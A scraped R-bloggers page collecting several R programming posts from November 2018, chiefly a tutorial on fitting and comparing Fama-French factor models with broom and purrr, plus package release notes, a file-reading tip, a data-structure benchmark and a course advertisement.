factors_data_address <- "http://mba.tuck.dartmouth.edu/pages/faculty/ken.french/ftp/Global_5_Factors_Daily_CSV.zip" factors_csv_name <- "Global_5_Factors_Daily.csv" temp <- tempfile() download.file( # location of file to be downloaded factors_data_address, # where we want R to store that file temp, quiet = TRUE) Global_5_Factors <- read_csv(unz(temp, factors_csv_name), skip = 6 ) %>% rename(date = X1, MKT = `Mkt-RF`) %>% mutate(date = ymd(parse_date_time(date, "%Y%m%d")))%>% mutate_if(is.numeric, funs(. / 100)) %>% select(-RF) Global_5_Factors %>% head() # A tibble: 6 x 6 date MKT SMB HML RMW CMA 1 1990-07-02 0.00700 -0.000600 -0.0031 0.0022 0.0004 2 1990-07-03 0.0018 0.0008 -0.0017 0.0007 0.0004 3 1990-07-04 0.0063 -0.0019 -0.0016 -0.0007 0.000300 4 1990-07-05 -0.0074 0.0031 0.0017 -0.0013 0.000600 5 1990-07-06 0.002 -0.0015 0.0002 0.002 -0.000300 6 1990-07-09 0.00240 0.0018 0.0001 0.0004 -0.00240

Next, we mash asset_returns_long and Global_5_Factors into one data object, using left_join(..., by = "date") because each object has a column called date.

data_joined_tidy <- asset_returns_long %>% left_join(Global_5_Factors, by = "date") %>% na.omit() data_joined_tidy %>% head(5) # A tibble: 5 x 8 # Groups: asset [1] date asset returns MKT SMB HML RMW CMA 1 2013-01-02 SPY 0.0253 0.0199 -0.0043 0.0028 -0.0028 -0.0023 2 2013-01-03 SPY -0.00226 -0.0021 0.00120 0.000600 0.0008 0.0013 3 2013-01-04 SPY 0.00438 0.0064 0.0011 0.0056 -0.0043 0.0036 4 2013-01-07 SPY -0.00274 -0.0014 0.00580 0 -0.0015 0.0001 5 2013-01-08 SPY -0.00288 -0.0027 0.0018 -0.00120 -0.0002 0.00120

We now have a tibble called data_joined_tidy with the asset names in the asset column, asset returns in the returns column, and our five FF factors in the MKT, SMB, HML, RMW and CMA columns. We want to explore whether there is a linear relationship between the returns of our five assets and any/all of the five FF factors. Specifically, we will run several linear regressions, save the results, examine the results, and then quickly visualize the results.

The broom and purrr packages will do a lot of the heavy lifting for us eventually, but let’s start with a simple example: regress the return of one ETF on one of the FF factors. We will use do() for this, which I believe has been declared not a best practice but it’s so irresistibly simple to plunk into the pipes.

data_joined_tidy %>% filter(asset == "SPY") %>% do(model = lm(returns ~ MKT, data = .)) Source: local data frame [1 x 2] Groups: # A tibble: 1 x 2 asset model * 1 SPY

That worked, but our model is stored as a nested S3 object. Let’s use tidy(), glance(), and augment() to view the results.

data_joined_tidy %>% filter(asset == "SPY") %>% do(model = lm(returns ~ MKT, data = .)) %>% tidy(model) # A tibble: 2 x 6 # Groups: asset [1] asset term estimate std.error statistic p.value 1 SPY (Intercept) 0.000126 0.000100 1.26 0.208 2 SPY MKT 1.02 0.0154 66.0 0 data_joined_tidy %>% filter(asset == "SPY") %>% do(model = lm(returns ~ MKT, data = .)) %>% glance(model) # A tibble: 1 x 12 # Groups: asset [1] asset r.squared adj.r.squared sigma statistic p.value df logLik 1 SPY 0.776 0.776 0.00354 4356. 0 2 5319. # ... with 4 more variables: AIC , BIC , deviance , # df.residual data_joined_tidy %>% filter(asset == "SPY") %>% do(model = lm(returns ~ MKT, data = .)) %>% augment(model) %>% head(5) # A tibble: 5 x 10 # Groups: asset [1] asset returns MKT .fitted .se.fit .resid .hat .sigma .cooksd 1 SPY 0.0253 0.0199 0.0204 3.17e-4 4.90e-3 7.99e-3 0.00354 7.77e-3 2 SPY -0.00226 -0.0021 -0.00201 1.07e-4 -2.47e-4 9.17e-4 0.00354 2.24e-6 3 SPY 0.00438 0.0064 0.00665 1.36e-4 -2.27e-3 1.47e-3 0.00354 3.02e-4 4 SPY -0.00274 -0.0014 -0.00130 1.04e-4 -1.44e-3 8.59e-4 0.00354 7.07e-5 5 SPY -0.00288 -0.0027 -0.00263 1.11e-4 -2.56e-4 9.82e-4 0.00354 2.56e-6 # ... with 1 more variable: .std.resid

We can quickly pop our augmented results into ggplot() and inspect our residuals versus our fitted values. The important takeaway here is that our augmented results are in a data frame, so we can use all of our ggplot() code flows to create visualizations.

data_joined_tidy %>% filter(asset == "SPY") %>% do(model = lm(returns ~ MKT, data = .)) %>% augment(model) %>% ggplot(aes(y = .resid, x = .fitted)) + geom_point(color = "cornflowerblue")

Alright, we have run a simple linear regression and seen how tidy(), glance(), and augment() clean up the model results. We could, of course, keep repeating this process for any combination of the FF factors and any of our ETFs, but let’s look at a more efficient approach for fitting multiple models on all of our ETFs.

First, let’s create and save three models as functions. That will allow us to pass them to the map functions from purrr. We will save a one-factor model as a function called model_one, a three-factor model as a function called model_two and a five-factor model as a function called model_three. Note that each function takes a data frame as an argument.

model_one <- function(df) { lm(returns ~ MKT, data = df) } model_two <- function(df) { lm(returns ~ MKT + SMB + HML, data = df) } model_three <- function(df) { lm(returns ~ MKT + SMB + HML + RMW + CMA, data = df) }

Now we want to run those three models on each of our five asset returns or, equivalently, we need to pass in a data frame of asset returns to each of those functions. However, we don’t want to save our five ETF returns as five separate tibbles. That would get quite unwieldy with a larger set of ETFs.

Instead, let’s use nest() to make our data more compact!

data_joined_tidy %>% group_by(asset) %>% nest() # A tibble: 5 x 2 asset data 1 SPY 2 EFA 3 IJS 4 EEM 5 AGG

In my mind, our task has gotten a little conceptually simpler: we want to apply each of our models to each tibble in the data column, and to do that, we need to pass each tibble in that column to our functions.

Let’s use a combination of mutate() and map().

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), three_factor_model = map(data, model_two), five_factor_model = map(data, model_three)) # A tibble: 5 x 5 asset data one_factor_model three_factor_mod… five_factor_mod… 1 SPY 2 EFA 3 IJS 4 EEM 5 AGG

From a substantive perspective, we’re done! We have run all three models on all five assets and stored the results. Of course, we’d like to be able to look at the results, but the substance is all there.

The same as we did above, we will use tidy(), glimpse(), and augment(), but now in combination with mutate() and map() to clean up the model results stored in each column. Let’s start by running just model_one and then tidying the results.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy)) # A tibble: 5 x 4 asset data one_factor_model tidied_one 1 SPY 2 EFA 3 IJS 4 EEM 5 AGG

If we want to see those tidied results, we need to unnest() them.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy)) %>% unnest(tidied_one) # A tibble: 10 x 6 asset term estimate std.error statistic p.value 1 SPY (Intercept) 0.000126 0.000100 1.26 2.08e- 1 2 SPY MKT 1.02 0.0154 66.0 0. 3 EFA (Intercept) -0.000288 0.0000972 -2.97 3.07e- 3 4 EFA MKT 1.29 0.0150 86.0 0. 5 IJS (Intercept) 0.0000634 0.000171 0.371 7.11e- 1 6 IJS MKT 1.13 0.0264 42.9 3.25e-248 7 EEM (Intercept) -0.000491 0.000203 -2.42 1.57e- 2 8 EEM MKT 1.40 0.0313 44.8 4.94e-263 9 AGG (Intercept) 0.0000888 0.0000572 1.55 1.21e- 1 10 AGG MKT -0.0282 0.00883 -3.19 1.46e- 3

Let’s use glance() and augment() as well.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy), glanced_one = map(one_factor_model, glance), augmented_one = map(one_factor_model, augment)) # A tibble: 5 x 6 asset data one_factor_model tidied_one glanced_one augmented_one 1 SPY

Again, we use unnest() if we wish to look at the glanced or augmented results.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy), glanced_one = map(one_factor_model, glance), augmented_one = map(one_factor_model, augment)) %>% # unnest(tidied_one) unnest(glanced_one) # A tibble: 5 x 16 asset data one_factor_model tidied_one augmented_one r.squared 1 SPY , sigma , # statistic , p.value , df , logLik , AIC , # BIC , deviance , df.residual # unnest(augmented_one) data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy), glanced_one = map(one_factor_model, glance), augmented_one = map(one_factor_model, augment)) %>% # unnest(tidied_one) # unnest(glanced_one) unnest(augmented_one) %>% head(5) # A tibble: 5 x 10 asset returns MKT .fitted .se.fit .resid .hat .sigma .cooksd 1 SPY 0.0253 0.0199 0.0204 3.17e-4 4.90e-3 7.99e-3 0.00354 7.77e-3 2 SPY -0.00226 -0.0021 -0.00201 1.07e-4 -2.47e-4 9.17e-4 0.00354 2.24e-6 3 SPY 0.00438 0.0064 0.00665 1.36e-4 -2.27e-3 1.47e-3 0.00354 3.02e-4 4 SPY -0.00274 -0.0014 -0.00130 1.04e-4 -1.44e-3 8.59e-4 0.00354 7.07e-5 5 SPY -0.00288 -0.0027 -0.00263 1.11e-4 -2.56e-4 9.82e-4 0.00354 2.56e-6 # ... with 1 more variable: .std.resid

Let’s change gears a bit and evaluate how well each model explained one of our asset returns, IJS, based on adjusted R-squareds.

First, we use filter(asset == "IJS"), nest the data, then map() each of our models to the nested data. I don’t want the raw data anymore, so will remove it with select(-data).

data_joined_tidy %>% group_by(asset) %>% filter(asset == "IJS") %>% nest() %>% mutate(one_factor_model = map(data, model_one), three_factor_model = map(data, model_two), five_factor_model = map(data, model_three)) %>% select(-data) # A tibble: 1 x 4 asset one_factor_model three_factor_model five_factor_model 1 IJS

We now have our three model results for the returns of IJS. Let’s use gather() to put those results in tidy format, and then glance() to get at the adjusted R-squared, AIC, and BIC.

models_results <- data_joined_tidy %>% group_by(asset) %>% filter(asset == "IJS") %>% nest() %>% mutate(one_factor_model = map(data, model_one), three_factor_model = map(data, model_two), five_factor_model = map(data, model_three)) %>% select(-data) %>% gather(models, results, -asset) %>% mutate(glanced_results = map(results, glance)) %>% unnest(glanced_results) %>% select(asset, models, adj.r.squared, AIC, BIC) models_results # A tibble: 3 x 5 asset models adj.r.squared AIC BIC 1 IJS one_factor_model 0.594 -9282. -9266. 2 IJS three_factor_model 0.599 -9298. -9272. 3 IJS five_factor_model 0.637 -9421. -9385.

Let’s plot these results and quickly glance at where the adjusted R-squareds lie. We will call ggplot(aes(x = models, y = adj.r.squared, color = models)) and then geom_point().

models_results %>% ggplot(aes(x = models, y = adj.r.squared, color = models)) + geom_point() + labs(x = "", title = "Models Comparison") + theme(plot.title = element_text(hjust = 0.5))

That chart looks alright, but the models are placed on the x-axis in alphabetical order, whereas I’d prefer they go in ascending order based on adjusted R-squared. We can make that happen with ggplot(aes(x = reorder(models, adj.r.squared)...). Let’s also add labels on the chart with geom_text(aes(label = models), nudge_y = .003). Since we’re labeling in the chart, we can remove the x-axis labels with theme(axis.text.x = element_blank()).

models_results %>% ggplot(aes(x = reorder(models, adj.r.squared), y = adj.r.squared, color = models)) + geom_point(show.legend = NA) + geom_text(aes(label = models), nudge_y = .003) + labs(x = "", title = "Models Comparison") + theme(plot.title = element_text(hjust = 0.5), axis.text.x = element_blank(), axis.ticks.x=element_blank())

Pay close attention to the scale on the y-axis. The lowest adjusted R-squared is less than .05 away from the highest. Maybe that amount is meaningful in your world, and maybe it isn’t.

Before we close, let’s get back to modeling and saving results. Here is the full code for running each model on each asset, then tidying, glancing, and augmenting those results. The result is a compact, nested tibble where the columns can be unnested depending on which results we wish to extract.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), three_factor_model = map(data, model_two), five_factor_model = map(data, model_three)) %>% mutate(tidied_one = map(one_factor_model, tidy), tidied_three = map(three_factor_model, tidy), tidied_five = map(five_factor_model, tidy)) %>% mutate(glanced_one = map(one_factor_model, glance), glanced_three = map(three_factor_model, glance), glanced_five = map(five_factor_model, glance)) %>% mutate(augmented_one = map(one_factor_model, augment), augmented_three = map(three_factor_model, augment), augmented_five = map(five_factor_model, augment)) # %>% # A tibble: 5 x 14 asset data one_factor_model three_factor_mod… five_factor_mod… 1 SPY 2 EFA 3 IJS 4 EEM 5 AGG # ... with 9 more variables: tidied_one , tidied_three , # tidied_five , glanced_one , glanced_three , # glanced_five , augmented_one , augmented_three , # augmented_five # unnest any broomed column for viewing # unnest(Insert nested column name here)

There are probably more efficient ways to do this, and in the future we’ll explore a package that runs these model comparisons for us, but for now, think about how we could wrap this work to a Shiny application or extend this code flow to accommodate more models and more assets.

Thanks for reading and see you next time!

_____='https://rviews.rstudio.com/2018/11/19/many-factor-models/';

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: R Views. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

RcppMsgPack 0.2.3

Sun, 11/18/2018 - 23:32

(This article was first published on Thinking inside the box , and kindly contributed to R-bloggers)

Another maintenance release of RcppMsgPack got onto CRAN today. Two new helper functions were added and not unlike the previous 0.2.2 release in, some additional changes are internal and should allow compilation on all CRAN systems.

MessagePack itself is an efficient binary serialization format. It lets you exchange data among multiple languages like JSON. But it is faster and smaller. Small integers are encoded into a single byte, and typical short strings require only one extra byte in addition to the strings themselves. RcppMsgPack brings both the C++ headers of MessagePack as well as clever code (in both R and C++) Travers wrote to access MsgPack-encoded objects directly from R.

Changes in version 0.2.3 (2018-11-18)
  • New functions msgpack_read and msgpack_write for efficient direct access to MessagePackage content from files (#13).

  • Several internal code polishes to smooth compilation (#14 and #15).

Courtesy of CRANberries, there is also a diffstat report for this release.

More information is on the RcppRedis page. Issues and bugreports should go to the GitHub issue tracker.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: Thinking inside the box . R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Statistics Sunday: Reading and Creating a Data Frame with Multiple Text Files

Sun, 11/18/2018 - 19:23

(This article was first published on Deeply Trivial, and kindly contributed to R-bloggers)

First Statistics Sunday in far too long! It’s going to be a short one, but it describes a great trick I learned recently while completing a time study for our exams at work.

To give a bit of background, this time study involves analzying time examinees spent on their exam and whether they were able to complete all items. We’ve done time studies in the past to select time allowed for each exam, but we revisit on a cycle to make certain the time allowed is still ample. All of our exams are computer-administered, and we receive daily downloads from our exam provider with data on all exams administered that day.

What that means is, to study a year’s worth of exam data, I need to read in and analyze 365(ish – test centers are generally closed for holidays) text files. Fortunately, I found code that would read all files in a particular folder and bind them into a single data frame. First, I’ll set the working directory to the location of those files, and create a list of all files in that directory:

setwd(“Q:/ExamData/2018”)
filelist <- list.files()

For the next part, I’ll need the data.table library, which you’ll want to install if you don’t already have it:

library(data.table)
Exams2018 <- rbindlist(sapply(filelist, fread, simplify = FALSE, use.names = TRUE, idcol = “FileName”)

Now I have a data frame with all exam data from 2018, and an additional column that identifies which file a particular case came from.

What if your working directory has more files than you want to read? You can still use this code, with some updates. For instance, if you want only the text files from the working directory, you could add a regular expression to the list.files() code to only look for files with “.txt” extension:

list.files(pattern = “\\.txt$”)

If you’re only working with a handful of files, you can also manually create the list to be used in the rbindlist function. Like this:

filelist <- c(“file1.txt”, “file2.txt”, “file3.txt”)

That’s all for now! Hope everyone has a Happy Thanksgiving!

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: Deeply Trivial. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Ultimate Python Cheatsheet: Data Science Workflow with Python

Sun, 11/18/2018 - 09:01

(This article was first published on business-science.io - Articles, and kindly contributed to R-bloggers)

At Business Science, we are developing a revolutionary system for teaching Business Analysis with Python (Business Analysis with Python is a new course we are developing at Business Science University).

The system is revolutionary for a number of reasons (we’ll get to these in a minute). The cornerstone of our teaching process is the Data Science with Python Workflow, which is an adaptation of the Data Science with R workflow originally taught by Hadley Wickham and Garrett Grolemund in the the excellent book, R For Data Science. The NEW Python Cheatsheet links the documentation, cheatsheets, and key resources available for the most widely used Python packages into one meta-cheatsheet that illustrates the workflow.

The NEW Python Cheatsheet links the documentation, cheatsheets, and key resources available for the most widely used Python packages into one meta-cheatsheet that illustrates the workflow.

Get The ULTIMATE Python Cheatsheet

Just go to our website, and you’ll see it available under the “Resources” Tab. The NEW Python Cheatsheet with the Data Science Workflow in Python is available for download here.

Download the ULTIMATE Python Cheatsheet

Get All Cheatsheets

Like our cheatsheets? Get them all!

You Need To Learn Data Science For Business with R!



Available Now!

To be efficient as a data scientist, you need to learn R. Take the course that has cut data science projects in half (see this testimonial from a leading data science consultant) and has progressed data scientists more than anything they have tried before. Over 10-weeks you learn what it has taken data scientists 10-years to learn:

  • Our systematic data science for business framework
  • R and H2O for Machine Learning
  • How to produce Return-On-Investment from data science
  • And much more.

Start Learning Today!

How To Use The Cheatsheet

The UTLITMATE Python Cheatsheet is an amazing reference. It contains the primary resources you need for getting up and running with Python for Data Science. Let’s take a look.

The Workflow

The first thing you will notice is the workflow that is prominently presented. You can see where the various Python Packages are used.

Python At Each Workflow Step

Links To Documentation

Here’s the beauty of the ULTIMATE Python Cheatsheet. With one click, you can easily get to the web documentation for any of the Python packages.

One-Click To Python Documentation

With one click, you can easily get to the web documentation for any of the Python packages.

Links To Key Resources

We didn’t stop at documentation and cheatsheets. We also added in important references to get you up to speed quickly.

One-Click To Important References

We didn’t stop at documentation and cheatsheets. We also added in important references to get you up to speed quickly.

Learning Python For Business

Are you interested in learning Python For Business? Then look no further.

  • Business Science University has the most advanced, technology intensive, and streamlined data science educational system for business on the planet.

  • We are developing a INTRODUCTORY BUSINESS ANALYSIS COURSE WITH PYTHON (DS4B 101-P) that delivers an amazing educational experience for learners that want to apply Python to business analysis.

Course Launch Date

To be determined – We are hopeful for December 2018 / January 2019. Sign up at university.business-science.io to get the course launch details once they are available.

Why Choose Business Science for Education?
  • Research: We know how to learn data science efficiently and what ingredients create high performance data science teams.

  • Business Application over Tools: We don’t teach tools. We teach how to solve business problems using tools. There is a key difference. Our approach builds knowledge you can apply immediately.

  • Learn In Weeks What Takes Years: When you take a Business Science University course, you learn everything needed to solve the business project. You learn from proven frameworks and workflows. We cut out anything that you don’t need to know. This makes our programs the most efficient programs for learning.

Learn Data Science For Business with R Today!



Available Now!

To be efficient as a data scientist, you need to learn R. Take the course that has cut data science projects in half (see this testimonial from a leading data science consultant) and has progressed data scientists more than anything they have tried before. Over 10-weeks you learn what it has taken data scientists 10-years to learn:

  • Our systematic data science for business framework
  • R and H2O for Machine Learning
  • How to produce Return-On-Investment from data science
  • And much more.

Start Learning Today!

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: business-science.io - Articles. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Growing List vs Growing Queue

Sun, 11/18/2018 - 06:54

(This article was first published on S+/R – Yet Another Blog in Statistical Computing, and kindly contributed to R-bloggers)

### GROWING LIST ### base_lst1 <- function(df) { l <- list() for (i in seq(nrow(df))) l[[i]] <- as.list(df[i, ]) return(l) } ### PRE-ALLOCATING LIST ### base_lst2 <- function(df) { l <- vector(mode = "list", length = nrow(df)) for (i in seq(nrow(df))) l[[i]] <- as.list(df[i, ]) return(l) } ### DEQUER PACKAGE ### dequer_queue <- function(df) { q <- dequer::queue() for (i in seq(nrow(df))) dequer::pushback(q, as.list(df[i, ])) return(as.list(q)) } ### LIQUEUER PACKAGE ### liqueuer_queue <- function(df) { q <- liqueueR::Queue$new() for (i in seq(nrow(df))) q$push(as.list(df[i, ])) return(q$data) } ### COLLECTIONS PACKAGE ### collections_queue <- function(df) { q <- collections::Queue$new() for (i in seq(nrow(df))) q$push(as.list(df[i, ])) return(q$as_list()) } ### RSTACKDEQUE PACKAGE ### rstackdeque_queue <- function(df) { q <- rstackdeque::rpqueue() for (i in seq(nrow(df))) q <- rstackdeque::insert_back(q, as.list(df[i, ])) return(as.list(q)) } nyc <- read.csv("Downloads/nycflights.csv") compare <- function(ds) { tests <- c("dequer_queue(ds)", "base_lst2(ds)", "liqueuer_queue(ds)", "collections_queue(ds)", "rstackdeque_queue(ds)") for (t in tests) print(identical(base_lst1(ds), eval(parse(text = t)))) } compare(nyc[1:10, ]) #[1] TRUE #[1] TRUE #[1] TRUE #[1] TRUE #[1] TRUE ### BENCHMARKS ### bm <- function(ds) { rbenchmark::benchmark(replications = 5, order = "elapsed", relative = "elapsed", columns = c("test", "replications", "elapsed", "relative"), "GROWING LIST" = base_lst1(ds), "PRE-ALLOCATING LIST" = base_lst2(ds), "DEQUER::QUEUE" = dequer_queue(ds), "LIQUEUER::QUEUE" = liqueuer_queue(ds), "COLLECTIONS::QUEUE" = collections_queue(ds), "RSTACKDEQUE::RPQUEUE" = rstackdeque_queue(ds) ) } bm(nyc[1:1000, ]) test replications elapsed relative #1 GROWING LIST 5 0.808 1.000 #2 PRE-ALLOCATING LIST 5 0.839 1.038 #5 COLLECTIONS::QUEUE 5 0.842 1.042 #4 LIQUEUER::QUEUE 5 1.091 1.350 #3 DEQUER::QUEUE 5 1.375 1.702 #6 RSTACKDEQUE::RPQUEUE 5 1.901 2.353 bm(nyc[1:10000, ]) # test replications elapsed relative #5 COLLECTIONS::QUEUE 5 8.175 1.000 #1 GROWING LIST 5 8.505 1.040 #2 PRE-ALLOCATING LIST 5 12.554 1.536 #4 LIQUEUER::QUEUE 5 17.325 2.119 #6 RSTACKDEQUE::RPQUEUE 5 21.785 2.665 #3 DEQUER::QUEUE 5 22.030 2.695 bm(nyc[1:20000, ]) # test replications elapsed relative #5 COLLECTIONS::QUEUE 5 16.730 1.000 #2 PRE-ALLOCATING LIST 5 17.134 1.024 #1 GROWING LIST 5 17.342 1.037 #4 LIQUEUER::QUEUE 5 48.359 2.891 #6 RSTACKDEQUE::RPQUEUE 5 52.420 3.133 #3 DEQUER::QUEUE 5 79.938 4.778 bm(nyc[1:30000, ]) # test replications elapsed relative #2 PRE-ALLOCATING LIST 5 24.600 1.000 #5 COLLECTIONS::QUEUE 5 24.797 1.008 #1 GROWING LIST 5 25.600 1.041 #6 RSTACKDEQUE::RPQUEUE 5 60.908 2.476 #4 LIQUEUER::QUEUE 5 102.482 4.166 #3 DEQUER::QUEUE 5 182.039 7.400 var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: S+/R – Yet Another Blog in Statistical Computing. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

epubr 0.5.0 CRAN release

Sun, 11/18/2018 - 01:00

(This article was first published on Matt's R Blog, and kindly contributed to R-bloggers)

The epubr package provides functions supporting the reading and parsing of internal e-book content from EPUB files. This post briefly highlights the changes from v0.4.0. See the vignette for a more comprehensive introduction.

Minor addition

There is not much to see with the upgrade to version 0.5.0. Only one user function has been added, epub_cat. All this does is allow you to cat chunks of parsed e-book text to the console in a more readable manner. This can be helpful to get a quick glimpse of the content you are working with in a way that is easier on the eyes than looking at table entries and object structures.

Arguments to epub_cat give you control over the formatting. It is not intended to serve any other purposes beyond this human-guided content inspection. Arguments include:

  • max_paragraphs
  • skip
  • paragraph_spacing
  • paragraph_indent
  • section_sep
  • book_sep

See the help documentation for details.

Minor change

epub_cat, and now epub_head for consistency, take a more generic-sounding first argument x as a data argument, rather than data or file. This is because these summary functions can now be used on a filename string pointing to an external EPUB file that does not otherwise need to be read into R or, alternatively, a data frame already read into R by epub. This allows you to avoid reading the files from disk multiple times if the data is already in your R session.

Some context around epub_cat

Also, notice that this operates on paragraphs, not lines, if by lines I meant sentences. Since this level of information has not been stripped from the text that has been read in, it can be used. This may not mean the same thing in every section of every e-book, but the general idea is that epub_cat respects line breaks in the text. It pays attention to where they are and where they are not. I chose to call these paragraphs; it’s the label that is by far most often the correct one. But a one-line title or even the distinct lines of text on the copyright page of an e-book would all be treated the same way.

Control ends there of course. For example, you cannot stipulate that a title line should be excluded from indenting. Remember that the purpose of epubr is to bring in text for analysis, while preserving much (but not all) of its structure. I.e., you want “only the text” to operate on with ease, but you also don’t want to be relegated to a single, gigantic character string (that may not even be in the correct order) that aggregates out potential variables that could be mapped to sections of text and their sequence. epubr is not intended to retain all the the XML tags that define the appearance of the original document. The fundamental purpose of epubr is to strip that out entirely.

Here is an example:

library(epubr) file <- system.file("dracula.epub", package = "epubr") (x <- epub(file)) #> # A tibble: 1 x 9 #> rights identifier creator title language subject date source data #> #> 1 Public~ http://www.~ Bram St~ Drac~ en Horror~ 1995~ http:/~ # A tibble: 15 x 4 #> section text nword nchar #> #> 1 item6 "The Project Gutenberg EBook of Dracula, by ~ 11252 60972 #> 2 item7 "But I am not in heart to describe beauty, f~ 13740 71798 #> 3 item8 "\" 'Lucy, you are an honest-hearted girl, I~ 12356 65522 #> 4 item9 "CHAPTER VIIIMINA MURRAY'S JOURNAL\nSame day~ 12042 62724 #> 5 item10 "CHAPTER X\nLetter, Dr. Seward to Hon. Arthu~ 12599 66678 #> 6 item11 "Once again we went through that ghastly ope~ 11919 62949 #> 7 item12 "CHAPTER XIVMINA HARKER'S JOURNAL\n23 Septem~ 12003 62234 #> 8 item13 "CHAPTER XVIDR. SEWARD'S DIARY-continued\nIT~ 13812 72903 #> 9 item14 "\"Thus when we find the habitation of this ~ 13201 69779 #> 10 item15 "\"I see,\" I said. \"You want big things th~ 12706 66921 #> 11 item16 "CHAPTER XXIIIDR. SEWARD'S DIARY\n3 October.~ 11818 61550 #> 12 item17 "CHAPTER XXVDR. SEWARD'S DIARY\n11 October, ~ 12989 68564 #> 13 item18 " \nLater.-Dr. Van Helsing has returned. He ~ 8356 43464 #> 14 item19 "End of the Project Gutenberg EBook of Dracu~ 2669 18541 #> 15 coverpage-wr~ "" 0 0 epub_cat(x, max_paragraphs = 3, skip = 100) #> CHAPTER IJONATHAN HARKER'S JOURNAL #> #> (Kept in shorthand.) #> #> 3 May. Bistritz.-Left Munich at 8:35 P. M., on 1st May, arriving at Vienna early next morning; should have arrived at 6:46, but train was an hour late. Buda-Pesth seems a wonderful place, from the glimpse which I got of it from the train and the little I could walk through the streets. I feared to go very far from the station, as we had arrived late and would start as near the correct time as possible. The impression I had was that we were leaving the West and entering the East; the most western of splendid bridges over the Danube, which is here of noble width and depth, took us among the traditions of Turkish rule.

I suppose this function could be useful for cat-ing text externally to another display or document for some use case other than just quick inspection at the console. If so, I would love to hear what that purpose is so that I might be able to improve epub_ cat or add some other functionality entirely. But in general I would consider this a tangential function in epubr. There are bigger fish to fry.

Encoding

The main change was my decision to no longer rely on native encoding (getOption("encoding")) when reading EPUB files. In my ignorance I thought there was no reason to fuss with this. However, I began noticing issues with improper character parsing, resulting in weird characters showing up in some places. My initial thought to substitute these odd strings of characters for what they were supposed to represent, e.g., an apostrophe, was a natural first thought and it did seem like a fairly contained problem, which is why I didn’t notice it sooner and no one else made any mention of it either. But this idea was missing the bigger picture (and it didn’t work well anyway).

I did some poking around and learned that while EPUB titles from various publishers can give the impression that EPUB formatting is the Wild West, there is apparently some standardization at least in terms of encoding, such that EPUB files have UTF encoding in common- UTF-8 obviously, but possibly UTF-16.

This led me to add an explicit encoding argument to epub, defaulting to UTF-8. This still allows the user to change it, though typically there should be no reason to do so, except possibly to change it to UTF-16 and I have no idea how common that even is.

This had the result of clearing up every issue I was seeing with improper character translation. Even at this point I thought it was just something to do with the fact that apparently EPUB files are all UTF-encoded. I only found out more recently that the native encoding option in relation to the Windows environment has been a nightmare to other developers on a more fundamental level.

Anyhow, if you were seeing any weird characters after reading in some EPUB files with epubr, hopefully the situation is improved now. I don’t expect epubr to be perfect (there are some strangely put together e-books out there), but so far so good.

Upcoming version

